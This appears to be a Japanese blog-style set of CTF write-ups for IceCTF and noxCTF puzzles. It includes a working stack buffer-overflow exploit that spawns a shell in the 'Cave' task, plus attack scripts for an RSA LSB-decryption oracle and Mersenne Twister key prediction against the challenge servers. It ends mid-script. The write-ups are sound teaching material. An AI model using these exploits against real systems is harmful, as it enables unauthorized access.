Hello World! (Miscellaneous 10)

問題にフラグが書いてあった。

IceCTF{this_is_a_flag}

garfeld (Cryptography 100)

添付のファイルに暗号の情報が書かれている。

中央下部の文字列が明らかにフラグの暗号。先頭がIceCTF{になるよう復号するためには07271978はシフト数と考えればよさそう。

import string

enc = 'IjgJUO{P_LOUV_AIRUS_GYQUTOLTD_SKRFB_TWNKCFT}'
nums = map(int, list('07271978'))

flag = ''
idx = 0
for c in enc:
    if c in string.uppercase:
        code = ord(c) - nums[idx%len(nums)]
        if code < ord('A'):
            code += 26
        flag += chr(code)
        idx += 1
    elif c in string.lowercase:
        code = ord(c) - nums[idx%len(nums)]
        if code < ord('a'):
            code += 26
        flag += chr(code)
        idx += 1
    else:
        flag += c

print flag

IceCTF{I_DONT_THINK_GRONSFELD_LIKES_MONDAYS}

Ancient Foreign Communications (Cryptography 300)

暗号は以下のようになっているので、まずはバイナリとしてファイルに起こす。

E2 A8 85 5D 5D E2 8C 9E E2 8C 9E E2 8C 9F 5B E2 A8 86 5D E2 8C 9F 5D 5D 5D E2 A8 86 E2 A8 86 E2 A8 86 E2 8C 9C 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 A8 85 E2 A8 85 E2 8C 9E E2 8C 9E E2 A8 86 5B 5D 5D 5D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D E2 8C 9F 5B 5B 5B E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9F E2 8C 9D E2 8C 9D E2 8C 9D E2 8C 9D 5D 5D 5D E2 8C 9E E2 8C 9E E2 8C 9E E2 8C 9D E2 8C 9D E2 8C 9D E2 A8 86 5D E2 8C 9E E2 8C 9E

with open('comms.txt', 'rb') as f:
    data = f.read().strip().split(' ')

b_data = ''
for i in range(len(data)):
    b_data += chr(int(data[i], 16))

with open('out.txt', 'wb') as f:
    f.write(b_data)

ファイルにしたものをUNICODE対応したエディタで見る。

⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]⌝⌝⌝⌝]]⌟[⌝⌝⌝⌝⌟⌝⌝⌝⌝]⌞⌞⌞⌝⌝⌝⨆]⌞⌞

メッシュ暗号にも似ているが、ドットがない。ただ3×3のマスの部分を表しているように見える。タイトルからも想像できる古典暗号によくあるものを思い返してみると、ガラケーとかのキーパッドを使った暗号があった。先頭から変換してみる。

例）
⨅：真ん中の下
⌞：右上

左上は該当する文字がないので無視。さらに意味が通るようにスペースを入れる。

the magic words are squeamish ossifrage

IceCTF{squeamish ossifrage}

Drumbone (Steganography 150)

StegSolveでBlue plane 0を見ると、QRコードが見える。

1,0のテキストに変換する。

from PIL import Image

img = Image.open('blue_plane_0.png').convert('RGB')
w, h = img.size

UNIT_WIDTH = 6
UNIT_HEIGHT = 6

qr = ''
for y in range(1, h, UNIT_HEIGHT):
    for x in range(1, w, UNIT_WIDTH):
        r, g, b = img.getpixel((x, y))
        if r == 0 and g == 0 and b == 0:
            qr += '1'
        else:
            qr += '0'
    qr += '\n'

with open('qr.txt', 'w') as f:
    f.write(qr)

$ python sqrd.py qr.txt
IceCTF{Elliot_has_been_mapping_bits_all_day}

IceCTF{Elliot_has_been_mapping_bits_all_day}

Lost in the Forest (Forensics 300)

添付ファイルはファイルシステムの一部が含まれているような感じ。
homeディレクトリにあるユーザはhkrのみ。そこの.bash_historyに何かヒントになるようなコマンドの記録がないか見てみる。

$ cat ./home/hkr/.bash_history
              :
wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
              :
mv eRkjLlksZp tool.py
              :
./tool.py ../secret > ../hzpxbsklqvboyou
              :

実際にこのtool.pyを入手する。

 cat ./home/hkr/hzpxbsklqvboyou 
8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT8NHY25mYthGfs5ndwx2Zk1lcaFGc4pWdVZFQoJmT
$ wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
--2018-09-08 10:37:42--  https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
gist.githubusercontent.com (gist.githubusercontent.com) をDNSに問いあわせています... 151.101.72.133
gist.githubusercontent.com (gist.githubusercontent.com)|151.101.72.133|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 364 [text/plain]
`eRkjLlksZp' に保存中

eRkjLlksZp          100%[===================>]     364  --.-KB/s    時間 0s    

2018-09-08 10:37:43 (42.6 MB/s) - `eRkjLlksZp' へ保存完了 [364/364]

$ cat eRkjLlksZp 
#!/usr/bin/python3
import sys
import base64

def encode(filename):
    with open(filename, "r") as f:
        s = f.readline().strip()
        return base64.b64encode((''.join([chr(ord(s[x])+([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x]) for x in range(len(s))])).encode('utf-8')).decode('utf-8')[::-1]*5

if __name__ == "__main__":
    print(encode(sys.argv[1]))

この情報を使って、hzpxbsklqvboyouのデータを復号する。

import base64

def decrypt(s):
    s = base64.b64decode(s[:len(s)/5][::-1])
    return ''.join([chr(ord(s[x]) - ([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x]) for x in range(len(s))])

with open('hzpxbsklqvboyou', 'r') as f:
    enc = f.read().strip()

flag = decrypt(enc)
print flag

IceCTF{good_ol_history_lesson}

Cave (Binary Exploitation 50)

ソースが提供されている。

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

void shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void message(char *input) {
    char buf[16];
    strcpy(buf, input);

    printf("The cave echoes.. %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1){
        message(argv[1]);
    } else {
        printf("Usage: ./shout <message>\n");
    }
    return 0;
}

入力をstrcpyでコピーして、printfに渡している。ここにスタックオーバーフローの脆弱性がある。
入力値を大きくしていくと、関数の戻り先のアドレスを上書きするはず。その場所を確認する。

[adversary ~]$ cd cave
[adversary ~/cave]$ ls
flag.txt  Makefile  shout  shout.c
[adversary ~/cave]$ gdb -q shout
Reading symbols from shout...(no debugging symbols found)...done.
(gdb) set arg `python -c "print('A'*20)"`
(gdb) run
Starting program: /home/adversary/cave/shout `python -c "print('A'*20)"`
The cave echoes.. AAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 200) exited normally]
(gdb) set arg `python -c "print('A'*30)"`
(gdb) run
Starting program: /home/adversary/cave/shout `python -c "print('A'*30)"`
The cave echoes.. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()

30バイト入力すると半分変わっている。29-32バイトが戻り先のアドレスを格納している場所と思われる。
今度はshellのアドレスを取得する。

(gdb) p &shell
$1 = (<text variable, no debug info> *) 0x804850b<shell>

戻り先のアドレスを書き換えるように実行すると、shellが取れ、フラグを取得できた。

[adversary ~/cave]$ python -c "import os; arg = 'A' * 28 + '\x0b\x85\x04\x08'; os.system('./shout ' + arg)"
The cave echoes.. AAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                              �
sh-4.4$ cat flag.txt
IceCTF{i_dont_think_cavemen_overflowed_buffers}

IceCTF{i_dont_think_cavemen_overflowed_buffers}

Discord (Welcome)

DiscordでnoxCTFのthe-flag-is-hereチャネルを見る。

noxCTF{w3lc0me_2_n0xC7F!!!!!!!!!!!!!!!!!}

Facebook (Welcome)

https://www.facebook.com/noxaleを探す。ある画像にノートPCがたくさんあるが、その中の一つのPCにフラグが表示されている。

noxCTF{SECRET_flag}

Twitter (Welcome)

https://twitter.com/teamnoxale/のトップの方にある記事のグラフ画像にフラグが書いてある。

noxCTF{follow_our_twitter_for_updates!}

Blind Date (Misc)

jpegファイルが添付されているが、画像は表示できない。4バイト単位でバイト文字が逆になっている。

with open('BlindDate.jpeg', 'rb') as f:
    data = f.read()

flag = ''
for i in range(0, len(data), 4):
    flag += data[i:i+4][::-1]

with open('flag.jpeg', 'wb') as f:
    f.write(flag)

戻してやると、jpgの末尾に以下の文字列の後、zipが含まれていることが分かる。zipはパスワードがかかっている。

Li4gICAuICAuLiAgLi4gICAuICAuLiAgLi4gICAuICAuLiAgLiAgLi4NCi4gICAgLiAgIC4gICAgICAgLiAgICAgIC4gICAgLiAgIC4gIC4gIA0KICAgIC4uICAgICAgICAgIC4uICAgICAgLiAgIC4uICAgICAgLiAgLg

$ echo Li4gICAuICAuLiAgLi4gICAuICAuLiAgLi4gICAuICAuLiAgLiAgLi4NCi4gICAgLiAgIC4gICAgICAgLiAgICAgIC4gICAgLiAgIC4gIC4gIA0KICAgIC4uICAgICAgICAgIC4uICAgICAgLiAgIC4uICAgICAgLiAgLg== | base64 -d
..   .  ..  ..   .  ..  ..   .  ..  .  ..
.    .   .       .      .    .   .  .  
    ..          ..      .   ..      .  .

点字のようだ。https://www.pharmabraille.com/braille-codes/unified-english-braille-ueb-code/を参考にデコードする。

F4C3P4LM

このパスワードで解凍できて、flag.txtが抽出できる。

$ cat flag.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++.+.+++++++++.<---.+++++++++++++++++.--------------.>+++.<+++++++++++++++++.<++++++++++++++++++.>>------.---------.--------.-----.++++++++++++++++++++++++++.<<.>>----.<++++++++.+++.>---------.<<+.>>++.<++.-----.+++++.<+++.>>++++++.<<-.>-----.<+.>.+++.>--------.<<---.>>++.<++.-----.+++++.<+++.>>++++++.<<-.++++++++++++.>>+++++++++.<<<++++++++++++++++++++++.
$ python3 brainfuck.py flag.txt
noxCTF{W0uld_y0u_bl1nd_d4t3_4_bl1nd_d4t3?}

noxCTF{W0uld_y0u_bl1nd_d4t3_4_bl1nd_d4t3?}

Marcode (Misc)

QRコードが次々に変わる動画。まずフレーム画像を抽出する。

import os
import cv2

movie = 'Marcode.mp4'
count = 0
cap = cv2.VideoCapture(movie)
 
while True:
    ret, frame = cap.read()
    if ret == True:
        count += 1
        cv2.imwrite('div/Marcode_' + str("{0:05d}".format(count)) +'.png', frame)
    else:
        break

それぞれQRコードになっているので、読み取ると、GoogleドライブのURLになっている。
試しにアクセスしてみると、アルファベット一文字の画像ファイルだった。つなげると文章になりそうだ。
まず順にQRコードを読み取り、GoogleドライブのURLの一覧にする。

from pyzbar.pyzbar import decode
from PIL import Image
import os

I_FILE_FORMAT = 'div/Marcode_%05d.png'

for i in range(1, 3491):
    i_filename = I_FILE_FORMAT % i
    data = decode(Image.open(i_filename))
    print data[0][0]

種類はそこまで多くないので、URLと文字の対応は一つ一つ確認する。そして、順に対応する文字をつなげる。

dic = {
'https://drive.google.com/open?id=1vHlCNodJ84iw51C8gIz4hr0UpsWNx3fm': ' ',
'https://drive.google.com/open?id=1p4m9gtvh31s2SJ9G1uNr8burIvQabm_k': '?',
'https://drive.google.com/open?id=1OqacmR-Ccc2YLVYCS2co4dWtSqfEGxIl': 'A',
'https://drive.google.com/open?id=151y0xa6hnTR9yp9G0D-dyox08bV4-JZX': 'B',
'https://drive.google.com/open?id=1GLtL-X1IS4ms6fwC2OQV4jAmXjI_6bjQ': 'C',
'https://drive.google.com/open?id=1JtDxAfX8AEC_mFzJPZofI1RyOL62MAmk': 'D',
'https://drive.google.com/open?id=1upmw0QvLjzp6b7RjCrjJGjYfRijF82-g': 'E',
'https://drive.google.com/open?id=1rHGDe2F5vLws9fA0M3L9IELX9LYaU50x': 'F',
'https://drive.google.com/open?id=1DV0ACuyKWsFm2ApXgHHDP_DSzwqmtt5M': 'G',
'https://drive.google.com/open?id=1c-go7QIZb_yqGDsRKlXG1j1Py7-wcSFG': 'H',
'https://drive.google.com/open?id=1Rw-Op049iTliLPFTTRj7p4gBXmm8IboN': 'I',
'https://drive.google.com/open?id=1uynnoN7ItBRls7MiqFa1rLE-W3o9CnY5': 'J',
'https://drive.google.com/open?id=1dtYor_A9Sf3DDTlczTLA0s9rBluVNoOX': 'K',
'https://drive.google.com/open?id=1H5DHyv0METKfLV7xdzw-SVXU_F1o1iKM': 'L',
'https://drive.google.com/open?id=1b5wz-LsIBxnA7mp5ImbNLZQY0nob94OO': 'M',
'https://drive.google.com/open?id=1cZlhiRoZcEiaNEwScBQd0IA2PXh1Z1tX': 'N',
'https://drive.google.com/open?id=1pXSHKhMzuKrUMg0x8ygZ36yTn0-9nBe8': 'O',
'https://drive.google.com/open?id=1DF2RneUWAb6wqp7YJ0vjOwDJGdENEc0Q': 'P',
'https://drive.google.com/open?id=1vPBtiNzUzYEOEKFK60vG305uPw9CDy8p': 'Q',
'https://drive.google.com/open?id=1lKeCjQFcTSuUzMGUEeEzPj4d2x1MLTJm': 'R',
'https://drive.google.com/open?id=1lSanpoEq3LeV0aaL6KEnUiJE2iGijdrt': 'S',
'https://drive.google.com/open?id=131OPuwNVggs0ZAsVie4dfA3k9zLWN-uu': 'T',
'https://drive.google.com/open?id=1hjIQq2fEcduFF0CfRs-MJ2hlCuC5lkW6': 'U',
'https://drive.google.com/open?id=1apKMrqUwZn5dOkRWfjbYgYH_RvkmPD2P': 'V',
'https://drive.google.com/open?id=1mZivmNZ8uDiUb5YUoF8sj9kZXKkh7GNO': 'W',
'https://drive.google.com/open?id=1UpU1_MTK-0XgCpcZKC4AVGsBswNpQTBO': 'X',
'https://drive.google.com/open?id=1g2I1a09lO4m0imhIzJ60LUeDPNDIdIp_': 'Y',
'https://drive.google.com/open?id=1nlp-HIwnRbG61mf5SF_BzMdlNAR7tHLt': 'Z'
}

with open('access_list.txt', 'r') as f:
    lines = f.readlines()

msg = ''
for line in lines:
    line = line.strip()
    msg += dic[line]

print msg

この結果、以下のようなメッセージになる。ただし、?はファイル名がelseになっていたので、記号などが入ることになる。

THE TWO MEN APPEARED OUT OF NOWHERE? A FEW YNARDS APART IN THE NARROW? MOONLIT LANE? FOR A SECOND THEY STOOD QUITE STOILL? WANDS DIRECTED AT EACH OTHER?S CHESTS? THEN? RECOGNIZING EACH OTHER? THEY STOWED THEIR WANDS BENEATH THEIR CLOAKS AND STARTED WALKING BRISKLY IN THE SAME DIRECTION? ?NEWS?? ASKED THE TALLEXR OF THE TWO? ?THE BEST?? REPLIED SEVERUS SNAPE? THE LANE WAS BORDERED ON THE LEFT BY WILD? LOW?GROWING BRAMBLES? ON THE RIGHT BY A HICGH? NEATLY MANICURED HEDGE? THE MEN?S LONG CLOAKS FLAPPED AROUND THEIR ANKLES AS THEY MARCHED? ?THOUGHT I MIGHTT BE LATE?? SAID YAXLEY? HIS BLUNT FEATURES SLIDING IN AND OUT OF SIGHT AS THE BRANCHES OF OVERHANGING TREES BROKE THE MOONLIGHT? ?IT WAS A LITTLE TRICKIER THAN I EXPECTEFD? BUT I HOPE HE WILL BE SATISFIED? YOU SOUND CONFIDENT THAT YOUR RECEPTION WILL BE GOOD?? SNAPE NODD?ED? BUT DID NOT ELABORATE? THEY TURNED RIGHT? INTO A WIDE DRIVAEWAY THAT LED OFF THE LANE? THE HIGH HEDGE CURVED INTO THEM? RUNNIVNG OFF INTO THE DISTANCE BEYOND THE PAIR OF IMPAOSING WROUGHT?IRON GATES BARRING THE MEN???S WAY? NEITDHER OF THEM BROKE STEP? IN SILENCE BOTH RAISED THEIR LEFT ARMS IN A KIND OF SALAUTE AND PASSED STRAIGHT THROUGH? AS THOUGH THE DARK METAL WAS SMOKE? THE YEW HEDGES MUFFLED THE SOKUND OF THE MEN???S FOOTSTEPS? THERE WAS A RUSTLE SOMEWHERE TO THEIR RIGHT? YAXLEY DREW HIS WAND AGAIN POINTING IT OVER HIS COMPANION???S HEAD? BUT THE SOURCE OF THE NOISE PROVED TO BE NOTHING MORE THAN A PURE?WHITE PEACOCK? STERUTTING MAJESTICALLY ALONG THE TOP OF THE HEDGE? ???HE ALWAYS DID HIMSELF WELL? LUCIUS? PEACOCKS?????? YAXLEY THRUST HIS WAND BADCK UNDER HIS CLOAK WITH A SNORT? A HANDSOME MANOR HOUSE GREW OUT OF THE DARKNESS AT THE END OF THE STRAIGHT DRIVE? LIGHTS GLINTING IN THE DIAMOND PANED DOWNSTAAIRS WINDOWS? SOMEWHERE IN THE DARK GARDEN BEYOND THE HEDGE A FOUNTAIN WAS PLAYING? GRAVEL CRACKLED BENEATH THEIR FEET AS SNAPE AND YAXLEY SPED TOWARD THE FRONT DOOR? WHICH SWUNG INWARD AT THEIR APPROACH? THOUGH NOBODY HAD VISIBLY OPENED VIT? THE HALLWAY WAS LARGE? DIMLY LIT? AND SUMPTUOUSLY DECORATED? WITH A MAGNIFICENT CARPET COVERING MOST OF THE STONE FLOOR? THE EYES OF THE PALE?FACED PORTRAITS ON THE WALL FOLLOWED SNAPE AND YAXLEY AS THEY STRODE PAST? THE TWO MEN HALTED AT A HEAVY WOODEN DOOR LEADING INTO THE NEXT ROOM? HESITATED FOR THE SPACE OF A HEARTBEAT? THEN SNAPE TURNED THE BRONZE HANDLE? THE DRAWING ROOM WAS FULL OF SILENT PREOPLE? SITTING AT A LONG AND ORNATE TABLE? THE ROOM???S USUAL FURNITURE HAD BEEN PUSHED CARELESSLY UP AGAINST THE WALLS? ILLUMINATION CAME FROM A ROARING FIRE BENEATH A HANDSOME MARBLE MANTELPIECE SURMOUNTED BY A GILDED MIRROR? SNAPE AND YAXLEY LINGERED FOR A MOMENT ON THE THRESHOLD? AS THEIR EYES GREW ACCUSTOMED TO THE LACK OF LIGHT? THEY WERE DRAWN UPWARD TO THE STRANGEST FEATURE OF THE SCENE? AN APPARENTLY UNCONSCIOUS HUMAN FIGURE HANGING UPSIDE DOWN OVER THE TABLE? REVOLVING SLOWLY AS IF SUSPENDED BY AAN INVISIBLE ROPE? AND REFLECTED IN THE MIRROR AND IN THE BARE? POLISHED SURFACE OF THE TABLE BELOW? NONE OF THE PEOPLE SEATED UNDERNEATH THIS SINGULAR SIGHT WERE LOOKING AT IT EXCEPT FOR A PALE YOUNG MAN SITTING ALMOST DIRECTLY BELOW IT? HE SEEMED UNABLE TO PREVENT HIMSELF FROM GLANCING UPWARD EVERY MINUTE OR SO? ???YAXLEY? SNAPE???? SAID A HIGH? CLEAR VOICE FROM THE HEAD OF THE TABLE? ???YOU ARE VERY NEARLY LATE???? THE SPEAKER WAS SEATED DIRECTLY IN FRONT OF THE FIREPLACE? SO THAT IT WAS DIFFICULT? AT FIRST? FOR THE NEW ARRIVAL?S TO MAKE OUT MORE THAN HIS SILHOUETTE?

この文章を調べるとハリーポッターのストーリーの一部であることがわかる。例えばhttps://www.lingq.com/ja/lesson/hp-7-hp-and-the-deathly-hallows-ch1-1-1166226/を参考にし、原文と照らし合わせ、加わった部分を並べる。'は???(3文字分)と表記されていることに気を付ける。

NOXCTF?AVADAKEDAVRA?

noxCTF{AVADAKEDAVRA}

Read Between The Lines (Misc)

$ file message.code 
message.code: gzip compressed data, was "message", from Unix, last modified: Fri Jul 20 21:53:57 2018
$ mv message.code message.gz
$ gzip -d message.gz

解凍したmessageの内容を確認すると、難読化したようなコードの後に、spaceやtabが含まれている。Whitespace言語のようだ。
http://www.hpcs.cs.tsukuba.ac.jp/~kanbayashi/whitespace.rb
上記を使って、実行する。

$ ruby whitespace.rb message.ws 
noxCTF{DaFuckIsWHITESPACE}whitespace.rb:470:in `sprintf': no implicit conversion from nil to integer (TypeError)
	from whitespace.rb:470:in `exec_io_out_a_char'
	from whitespace.rb:439:in `exec_io'
	from whitespace.rb:61:in `interprete'
	from whitespace.rb:28:in `main'
	from whitespace.rb:637:in `<main>'

エラーが出ているが、フラグはわかった。

noxCTF{DaFuckIsWHITESPACE}

Chop Suey (Crypto)

RSA暗号でn, eの代わりにdp, dpが分かっている場合の復号を行う。

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229
q = 12640674973996472769176047937170883420927050821480010581593137135372473880595613737337630629752577346147039284030082593490776630572584959954205336880228469
dp = 6500795702216834621109042351193261530650043841056252930930949663358625016881832840728066026150264693076109354874099841380454881716097778307268116910582929
dq = 783472263673553449019532580386470672380574033551303889137911760438881683674556098098256795673512201963002175438762767516968043599582527539160811120550041
c = 24722305403887382073567316467649080662631552905960229399079107995602154418176056335800638887527614164073530437657085079676157350205351945222989351316076486573599576041978339872265925062764318536089007310270278526159678937431903862892400747915525118983959970607934142974736675784325993445942031372107342103852

qinv = modinv(q, p)
m1 = pow(c, dp, p)
m2 = pow(c, dq, q)
h = (qinv * (m1 - m2)) % p
m = m2 + h * q

flag = ('%x' % m).decode('hex')
print flag

noxCTF{W31c0m3_70_Ch1n470wn}

Decryptor (Crypto)

$ nc chal.noxale.com 4242
Please insert your ciphertext to decrypt in hex form:
0
0
$ nc chal.noxale.com 4242
Please insert your ciphertext to decrypt in hex form:
1
1
$ nc chal.noxale.com 4242
Please insert your ciphertext to decrypt in hex form:
2
c073e0ce8e6b81d6641fb7ec8926af0c9737a18e25815c2528772315d069073b0dd6288dd8cf0d7e9ce44f776bfb3269445421180b178dd5b63e109416fbd80a3874546929fc4dfe2b82c3024bdf0716d7fdde303533f473078f265e9c7ba8e11dd5a70b28241352deea70a44c4f3f9c58a39c76abcdf138491437a480ceb178
$ nc chal.noxale.com 4242
Please insert your ciphertext to decrypt in hex form:
7b1a62cb17160448d544ff674f978876d2a4418ff9cfc32e9eda41ed566617a034c34091f19dbe650fdb11e7aa5744a48709b61a44a499c213dc19eb092fd8282e5ec69051d3adba84129571143e14e14be7f63bd8cdb42a4eedfb62570ed7eaef8002c3f6f3267079833effe836d8e10e0f01bcbd2470b2c0c10b59d1aa260a
Not gonna happen.

復号してくれるシステムだが、問題の暗号だけは復号してくれない。LSB decryption oracle attackで復号する。

from fractions import Fraction
import socket

def lsb_oracle(enc):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('chal.noxale.com', 4242))
    data = s.recv(1024)
    print data + enc
    s.sendall(enc + '\n')
    data = s.recv(1024)
    print data
    return int(data, 16) % 2

N = 140165355674296399459239442258630641339281917770736077969396713192714338090714726890918178888723629353043167144351074222216025145349467583141291274172356560132771690830020353668100494447956043734613525952945037667879068512918232837185005693504551982611886445611514773529698595162274883360353962852882911457919
c = 86445915530920147553767348020686132564453377048106098831426077547738998373682256014690928256854752252580894971618956714013602556152722531577337080534714463052378206442086672725486411296963581166836329721403101091377505869510101752378162287172126836920825099014089297075416142603776647872962582390687281063434
e = 65537

bounds = [0, Fraction(N)]

i = 0
m = 0
while True:
    print 'Round %d' % (i+1)
    i += 1

    c2 = (c * pow(2, e, N)) % N
    ct2 = '%x' % c2
    lsb = lsb_oracle(ct2)
    if lsb == 1:
        bounds[0] = sum(bounds)/2
    else:
        bounds[1] = sum(bounds)/2
    diff = bounds[1] - bounds[0]
    diff = diff.numerator / diff.denominator
    if diff == 0:
        m = bounds[1].numerator / bounds[1].denominator
        break
    c = c2

flag = ('%x' % m).decode('hex')
print flag

noxCTF{0u7sm4r73d}

Plot Twist (Crypto)

鍵を予測し、当たっていれば、フラグが表示される。間違っていると、鍵を教えてくれる。Mersenne Twisterの性質から鍵を予測する。

import socket
import re
import random

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

def untemper(rand):
    rand ^= rand >> 18;
    rand ^= (rand << 15) & 0xefc60000;
 
    a = rand ^ ((rand << 7) & 0x9d2c5680);
    b = rand ^ ((a << 7) & 0x9d2c5680);
    c = rand ^ ((b << 7) & 0x9d2c5680);
    d = rand ^ ((c << 7) & 0x9d2c5680);
    rand = rand ^ ((d << 7) & 0x9d2c5680);
 
    rand ^= ((rand ^ (rand >> 11)) >> 11);
    return rand

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chal.noxale.com', 5115))

N = 624
state = []
for i in range(N):
    tmp_key = '1234567890123456'
    data = recvuntil(s, '\n')
    print data + tmp_key
    s.sendall(tmp_key)
    data = recvuntil(s, '\n')
    print data
    pattern = 'The key was: (.+)'
    m = re.search(pattern, data)
    key =  int(m.group(1))
    state.append(untemper(key))

state.append(N)
random.setstate([3, tuple(state), None])

real_key = str(random.getrandbits(32)).rjust(16, '0')
data = recvuntil(s, '\n')
print data + real_key
s.sendall(real_key)
data = recvuntil(s, '\n')
print data

noxCTF{41w4ys_us3_cryp70_s3cur3d_PRNGs}

Trinity (Crypto)

RSA暗号でHastad's broadcast attackで復号する問題と推測。eは3のはず。そのままHastad's broadcast attackをしても復号できない。よく見るとN,cの値が0～4しか使われていない。5進数表記となっているとみて、Hastad's broadcast attackで復号する。

import functools

def chinese_remainder(n, a):
    sum = 0
    prod = functools.reduce(lambda a, b: a*b, n)
    for n_i, a_i in zip(n, a):
        p = prod // n_i
        sum += a_i * mul_inv(p, n_i) * p
    return sum % prod
 
def mul_inv(a, b):
    b0 = b
    x0, x1 = 0, 1
    if b == 1: return 1
    while a > 1:
        q = a // b
        a, b = b, a%b
        x0, x1 = x1 - q * x0, x0
    if x1 < 0: x1 += b0
    return x1

def inv_pow(c, e):
    low = -1
    high = c+1
    while low + 1 < high:
        m = (low + high) // 2
        p = pow(m, e)
        if p < c:
            low = m
        else:
            high = m
    m = high
    assert pow(m, e) == c
    return m

N1 = 331310324212000030020214312244232222400142410423413104441140203003243002104333214202031202212403400220031202142322434104143104244241214204444443323000244130122022422310201104411044030113302323014101331214303223312402430402404413033243132101010422240133122211400434023222214231402403403200012221023341333340042343122302113410210110221233241303024431330001303404020104442443120130000334110042432010203401440404010003442001223042211442001413004
c1 = 310020004234033304244200421414413320341301002123030311202340222410301423440312412440240244110200112141140201224032402232131204213012303204422003300004011434102141321223311243242010014140422411342304322201241112402132203101131221223004022003120002110230023341143201404311340311134230140231412201333333142402423134333211302102413111111424430032440123340034044314223400401224111323000242234420441240411021023100222003123214343030122032301042243

N2 = 302240000040421410144422133334143140011011044322223144412002220243001141141114123223331331304421113021231204322233120121444434210041232214144413244434424302311222143224402302432102242132244032010020113224011121043232143221203424243134044314022212024343100042342002432331144300214212414033414120004344211330224020301223033334324244031204240122301242232011303211220044222411134403012132420311110302442344021122101224411230002203344140143044114
c2 = 112200203404013430330214124004404423210041321043000303233141423344144222343401042200334033203124030011440014210112103234440312134032123400444344144233020130110134042102220302002413321102022414130443041144240310121020100310104334204234412411424420321211112232031121330310333414423433343322024400121200333330432223421433344122023012440013041401423202210124024431040013414313121123433424113113414422043330422002314144111134142044333404112240344

N3 = 332200324410041111434222123043121331442103233332422341041340412034230003314420311333101344231212130200312041044324431141033004333110021013020140020011222012300020041342040004002220210223122111314112124333211132230332124022423141214031303144444134403024420111423244424030030003340213032121303213343020401304243330001314023030121034113334404440421242240113103203013341231330004332040302440011324004130324034323430143102401440130242321424020323
c3 = 10013444120141130322433204124002242224332334011124210012440241402342100410331131441303242011002101323040403311120421304422222200324402244243322422444414043342130111111330022213203030324422101133032212042042243101434342203204121042113212104212423330331134311311114143200011240002111312122234340003403312040401043021433112031334324322123304112340014030132021432101130211241134422413442312013042141212003102211300321404043012124332013240431242

N = [int(str(N1), 5), int(str(N2), 5), int(str(N3), 5)]
C = [int(str(c1), 5), int(str(c2), 5), int(str(c3), 5)]
e = len(N)
a = chinese_remainder(N, C)
for n, c in zip(N, C):
    assert a % n == c
m = inv_pow(a, e)
flag = ('%x' % m).decode('hex')
print flag

noxCTF{D4mn_y0u_h4s74d_wh47_4_b100dy_b4s74rd!}

WTF (Crypto)

N,e,cに使われている文字を見てみる。

['A', 'B', 'E', 'g', 'l', 'O', 'S', 'b', 'T', 'Z']

10個あり、leet文字として0～9にあてはめられる。

0: O
1: l
2: Z
3: E
4: A
5: S
6: b
7: T
8: B
9: g

N,e,cを通常の数値に変換すると、eの値が大きいので、Wiener's Attackで復号する。

from fractions import Fraction

def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

def decrypt(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    gcd, a, b = egcd(e, phi)
    d = a
    pt = pow(c, d, n)
    return hex(pt)[2:-1].decode('hex')

def continued_fractions(n,e):
    cf = [0]
    while e != 0:
        cf.append(int(n/e))
        N = n
        n = e
        e = N%e
    return cf

def calcKD(cf):
    kd = list()
    for i in range(1,len(cf)+1):
        tmp = Fraction(0)
        for j in cf[1:i][::-1]:
            tmp = 1/(tmp+j)
        kd.append((tmp.numerator,tmp.denominator))
    return kd

def int_sqrt(n):
